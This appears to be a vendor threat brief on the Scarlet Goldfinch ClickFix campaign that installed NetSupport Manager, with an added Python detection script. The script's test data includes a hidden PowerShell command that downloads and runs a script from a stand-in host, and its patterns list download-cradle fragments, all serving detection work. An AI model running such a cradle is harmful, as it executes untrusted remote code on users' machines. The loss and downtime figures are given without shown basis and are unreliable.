Executive Summary
In 2025, the Scarlet Goldfinch threat actor launched a sophisticated malware campaign utilizing the ClickFix social engineering technique. This method deceived users into executing malicious commands under the guise of routine system verifications, leading to the installation of NetSupport Manager, a remote access tool. The campaign primarily targeted Windows systems, exploiting compromised websites to display fake browser update prompts, which, when acted upon, initiated the malware download and execution process. (redcanary.com)
The significance of this incident lies in the evolution of social engineering tactics, highlighting the increasing sophistication of threat actors in bypassing traditional security measures. The widespread use of ClickFix underscores the necessity for enhanced user education and the implementation of robust security protocols to mitigate such deceptive attack vectors.
Why This Matters Now
The resurgence and evolution of ClickFix campaigns, as demonstrated by Scarlet Goldfinch, emphasize the urgent need for organizations to bolster their defenses against advanced social engineering attacks. The adaptability of these techniques poses a continuous threat, necessitating proactive measures to safeguard sensitive information and maintain operational integrity.
Attack Path Analysis
The Scarlet Goldfinch campaign began with users being tricked into executing malicious commands via fake browser update prompts, leading to the installation of NetSupport Manager. The attackers then escalated privileges by leveraging the remote access capabilities of NetSupport Manager to gain higher-level access. Using this access, they moved laterally across the network to compromise additional systems. They established command and control through NetSupport Manager, allowing continuous remote control over the infected systems. Sensitive data was exfiltrated using the remote access tool to transfer information to external servers. The campaign concluded with the deployment of additional malware, potentially leading to further data theft or system disruption.
Kill Chain Progression
Initial Compromise
Description
Users were deceived into executing malicious commands via fake browser update prompts, leading to the installation of NetSupport Manager.
MITRE ATT&CK® Techniques
User Execution: Malicious Copy and Paste
Phishing: Spearphishing Attachment
Application Layer Protocol: Web Protocols
Command and Scripting Interpreter: PowerShell
Exploitation for Client Execution
Ingress Tool Transfer
Process Injection
Indicator Removal on Host: File Deletion
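The chain described above (a pasted command runs an interpreter, the interpreter fetches a payload over the web, and a remote access tool starts from a user-writable path) is what an endpoint detection for ClickFix keys on. The following is an added example, not code from this page or from Red Canary: it scores constructed process-creation records against that chain. The event schema, host names, paths and command lines are made up for the demonstration; client32.exe is NetSupport Manager's client executable but is listed as an assumption, not as an indicator taken from the page.

```python
"""Flag the ClickFix execution chain in process-creation telemetry (added example)."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (constructed schema, not the page's telemetry)."""
    host: str
    parent_image: str
    image: str
    command_line: str

# Interpreters a pasted ClickFix command is typically launched through.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A parent of explorer.exe means the user started the interpreter interactively
# (Run dialog, Start menu, terminal) rather than a service or scheduled task.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Download-cradle and evasion fragments that a benign interactive shell rarely carries.
CRADLE_PATTERNS = [
    ("remote url",       re.compile(r"https?://", re.I)),
    ("download verb",    re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile|bitsadmin)\b", re.I)),
    ("execute download", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("encoded command",  re.compile(r"-(enc|encodedcommand|e)\b", re.I)),
    ("hidden window",    re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("no profile",       re.compile(r"-nop\b|-noprofile", re.I)),
]
CRADLE_THRESHOLD = 2  # require two independent fragments before an interactive shell is flagged
# Remote access tool binaries started from a user-writable location. client32.exe is
# NetSupport Manager's client executable; listing it here is an assumption for the sample.
RAT_IMAGES = {"client32.exe"}
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\(appdata|downloads)|programdata|windows\\temp)\\", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the reasons an event matches the ClickFix chain (empty list if none)."""
    reasons = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img in INTERPRETERS and parent in INTERACTIVE_PARENTS:
        hits = [label for label, rx in CRADLE_PATTERNS if rx.search(ev.command_line)]
        if len(hits) >= CRADLE_THRESHOLD:
            reasons.append(f"{img} launched from {parent} with {', '.join(hits)}")
    if img in RAT_IMAGES and USER_WRITABLE.search(ev.image):
        reasons.append(f"remote access tool {img} started from user-writable path")
    return reasons

def detect(events):
    """Run classify() over a batch and return the flagged events with their reasons."""
    return [{"host": ev.host, "image": ev.image, "reasons": r}
            for ev in events if (r := classify(ev))]

# Constructed sample telemetry: two benign records and the two stages of the chain.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("WS-01", r"C:\Windows\explorer.exe", PS, "powershell.exe"),
    ProcessEvent("WS-02", r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    ProcessEvent("WS-03", r"C:\Windows\explorer.exe", PS,
                 "powershell -w hidden -nop -c \"iex (iwr 'https://update-check.example/verify.ps1' -UseBasicParsing)\""),
    ProcessEvent("WS-03", PS, r"C:\Users\jdoe\AppData\Roaming\NetSupport\client32.exe",
                 "client32.exe"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["host"], hit["image"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

The interactive-parent gate keeps scheduled and service-launched scripts out of the alert set, and the two-fragment threshold stops a user who simply opens PowerShell from firing the rule; the second stage (a remote access tool appearing under a profile directory) is reported independently so it still surfaces when the first stage was not logged.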
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Training and Monitoring
Control ID: 500.14
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – User Training and Awareness
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
ClickFix malware campaigns target financial institutions through social engineering, compromising encrypted traffic and enabling lateral movement across banking networks.
Health Care / Life Sciences
Healthcare systems face critical HIPAA compliance risks from ClickFix attacks exploiting unencrypted traffic and inadequate segmentation in medical networks.
Government Administration
Government agencies are vulnerable to ClickFix campaigns targeting zero trust gaps, with a high risk of lateral movement and data exfiltration.
Information Technology/IT
IT organizations are directly targeted by ClickFix malware exploiting cloud security gaps, threatening multicloud visibility and egress policy enforcement capabilities.
Sources
- Scarlet Goldfinch’s year in ClickFix (https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/)
- Think before you Click(Fix): Analyzing the ClickFix social engineering technique (https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/)
- ClickFix techniques evolve in new infostealer campaigns (https://www.csoonline.com/article/4145123/clickfix-techniques-evolve-in-new-infostealer-campaigns.html)
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to the Scarlet Goldfinch campaign as it could likely limit the attacker's ability to escalate privileges, move laterally, and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: Aviatrix Zero Trust CNSF may not directly prevent the initial execution of malicious commands by users.
Control: Zero Trust Segmentation
Mitigation: Implementing Zero Trust Segmentation could likely limit the attacker's ability to escalate privileges by restricting access to sensitive systems and services.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security would likely reduce the attacker's ability to move laterally by monitoring and controlling internal traffic flows.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control could likely detect and limit unauthorized command and control communications.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement would likely limit unauthorized data exfiltration by controlling outbound traffic.
While Aviatrix Zero Trust CNSF may not prevent the initial malware deployment, its segmentation and traffic controls could likely limit the spread and impact of additional malware.
Impact at a Glance
Affected Business Functions
- Customer Support
- Online Services
- Data Management
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of customer personal information and internal operational data.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement and limit the spread of malware within the network.
- Enhance Threat Detection & Anomaly Response capabilities to identify and respond to unusual activities promptly.
- Utilize Inline IPS (Suricata) to detect and prevent known exploit patterns and malicious payloads.
- Enforce Egress Security & Policy Enforcement to control outbound traffic and prevent unauthorized data exfiltration.
- Ensure comprehensive Multicloud Visibility & Control to monitor and manage security across all cloud environments.